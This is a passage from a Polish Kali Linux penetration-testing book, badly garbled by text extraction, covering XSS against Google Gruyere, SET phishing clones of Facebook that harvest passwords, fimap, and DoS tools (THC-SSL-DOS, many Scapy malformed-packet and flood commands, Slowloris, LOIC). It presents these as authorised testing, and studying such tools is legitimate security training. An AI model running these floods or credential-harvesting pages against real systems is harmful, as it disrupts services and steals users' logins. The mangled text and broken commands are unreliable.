W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

